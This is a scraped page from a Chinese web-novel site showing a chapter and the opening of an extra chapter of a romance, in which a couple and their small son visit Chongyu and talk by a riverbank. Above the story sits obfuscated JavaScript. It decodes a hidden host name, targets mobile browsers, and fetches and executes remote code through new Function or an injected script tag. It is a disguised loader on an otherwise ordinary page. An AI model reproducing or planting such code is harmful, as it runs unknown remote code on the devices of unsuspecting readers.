乐文小说网

阅读记录  |   用户书架
u'y'c 上一章
目录 | 设置
下一页
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
电影推荐:红发女郎 
热门推荐: 御月望舒(np,高H)

被迫嫁给丑夫后 第112节(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('\t\t\t这年春节过后,天渐渐暖了起来时,邱鹤年从抽屉里拿了一本陈旧的书出来。

清言伸头过去看了看,发现是他刚来这里时,看的那本《山河记》。

邱鹤年把书翻到地图那一页,指腹在清言以前画过的线上划过。

清言看着当年邱鹤年去风雨关时,自己做过的一个个标记,不由得笑了笑,说:“我还记得,当时你经过了崇裕县,我还惦记你有没有吃到正宗的崇裕酱猪蹄。”

邱鹤年目光在崇裕县的标识上停留了一会,说:“我记得,当年从风雨关回来,我说要和你一起走走我经过的路。”

“清言,以后每年我们都花些时间,去这《山河记》里我们喜欢的地方走走怎样?”

清言欣然应允,“当然好。”

邱鹤年手指在崇裕县的位置点了点,说:“那么第一处地方,便去这崇裕县吧。”

……

这年四月底,过完了清明节,祭拜完家里的先人,夫夫两抱着孩子,赶了马车,便出发去了崇裕。

在崇裕县城,一家三口找到了在《山河记》中提到的那家“崇裕酱猪蹄”,买了当地有名的烧酒和小菜,满足地大吃了一顿。

金豆长了十多颗小白牙了,啃猪蹄那叫一个溜,吃得满嘴都是油。

酒足饭饱,一家人去崇裕的河堤上溜达消化食儿。

天气暖和了,河堤边上有人在带孩子放纸鸢,金豆见了也想要,邱鹤年便过去问了在哪买的,给金豆也买了一只,往天上放了。

金豆跑得摔了好几个跟头,也一下没哭,玩得高兴极了。

玩累了,他就在爹爹怀里睡熟了,邱鹤年把纸鸢收了回来,低声问清言道:“要去堤上坐一会儿吗?”

清言点了点头,邱鹤年便从他怀里把沉甸甸的金豆抱了过去,然后把纸鸢给他拿着,一起往河堤上去了。

坐到河堤边儿上,清言从随身带的包袱里找出一件衫子,盖在了金豆身上,然后往邱鹤年那边挪了挪,挪到两人胳膊碰胳膊的距离。

两人看着河堤下不远处的游船,还有河里闲适的野鸭子。

河岸边小草青青,吸进鼻腔的空气暖融融的,有小草的苦香,还有附近野餐的食物香气。

清言想起了什么,笑着看向身边的人,说:“你还记得咱们在木陵听过的那出黄龙戏吗?”

那出戏唱的是一女子与夫君春游,在堤上喝酒的一段,与现在的情境几乎一模一样。

邱鹤年明白清言的意思,他笑了一下,清了清嗓子,低声唱道:“一愿郎君千岁,二愿妾身常健,三愿如同梁上燕,岁岁长相见。”

清言听得笑眯了眼睛,他用额头在邱鹤年头侧碰了碰,赞道:“真好听。”

邱鹤年笑道:“你喜欢就好。”

清言抬起胳膊深呼吸了一口气,伸了个懒腰,然后就望着远处发起呆来。

邱鹤年转头看了他一眼,问道:“在想什么?”

清言垂下眼皮,像在犹豫什么,过了会儿,他晃晃头,弯起唇角笑了,说:“我给你讲个故事吧,想听吗?”

邱鹤年看着他,“嗯”了一声。

清言便沉吟了一阵,组织了一下语言,说:“很早很早以前,在盘古开天辟地之后,混沌初开,天地间有了阴阳流转。随着岁月的流逝,那漫长的时间线收拢汇聚为一个个独立的光团,它们也许是整齐地一个个按顺序分布着,也可能偶尔被意外打乱,没有规则混乱成一片。”

“这些光团,我们可以称呼它们为小世界。每个小世界定格了一个独一无二的时间段,互不打扰,也没有交汇。但当意外的混乱发生时,某两个或几个光团可能发生碰撞和交融,一般来讲,这种极为短暂的交融不会带来什么影响,但偶尔也会出现例外。”

邱鹤年饶有兴致地问:“什么例外,比如说呢?”

清言说:“比如说,有个幸运的倒霉蛋就是在一次交融时,命本该绝的他,从一个小世界穿越到了另一个小世界里,被迫与另一个幸运的倒霉蛋交换了世界和身份。”

邱鹤年微微一怔,本来放松的神色渐渐严肃起来。

清言继续道:“之所以叫他倒霉蛋,是因为他差点就死了,虽然侥幸活了下来,却是离开了自己生活的地方,来到一个完全陌生的世界,并且永远都没法回去了。”

身边人听到这里,眉头皱了起来,清言抬手挽住他臂弯,笑了笑道:“但他是幸运的,他还活着,并且在这不属于他的小世界里,他得到了在以前的世界里没得到的东西,他有了真心待他的爱人,有了可爱纯真的孩子,有了善良宽厚的亲戚,有了相处融洽的朋友,他虽然离开了熟悉的地方,但新世界回馈给他的,比拿走的,要多得多!”

邱鹤年沉默了一阵,开口问道:“离开家这么久,他会想家吗?”

清言点头,又摇头,“偶尔会想的,毕竟那个小世界有很多好玩的东西,但他的家已经不在原来的世界了,这个新的小世界才是他的家,那边再好玩,他也不想回去了。”

闻言,邱鹤年喉结动了动,语气郑重道:“我想,这个世界好不容易才拥有了他,会一直待他好的。”

清言笑着蹭了蹭他的肩,望着远方,感叹道:“缘分真是很玄妙的东西啊!”

两人又在河堤边坐了一阵,太阳西斜,金豆睡醒了,在父亲怀里撒娇地蹭蹭,清言也把脸埋在男人颈窝里轻轻磨蹭,邱鹤年低头在夫郎和孩子的额头上分别亲了亲,说:“起风了,走吧,我们回去。”

金豆下了地,被爹爹和父亲牵着手,慢慢悠悠地,一家三口在西斜的阳光里,往他们租住的闹市中的客栈而去。

一年四季,均有美景,但错过了一些也不一定遗憾和可惜。

此时正是春光大好,纠结于过去的失去,不如放松心情享受当下,着眼未来。

“珍惜”两个字,说来简单,做来也容易,只要心诚即可。

第133章番外一:夫夫日常

金豆满两岁的那年冬天,隔了几年了,邱鹤年和清言终于又上山打猎了。

他们家不缺过年的肉食,是金豆渐渐大了,有一次去刘猎户家找他五六岁大的小孙女玩时,看见了一整块灰狼皮,就觉得新奇。

再加上那小孙女绘声绘色地给他讲和爷爷上山的事,把金豆听得一愣一愣的,羡慕的不得了。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间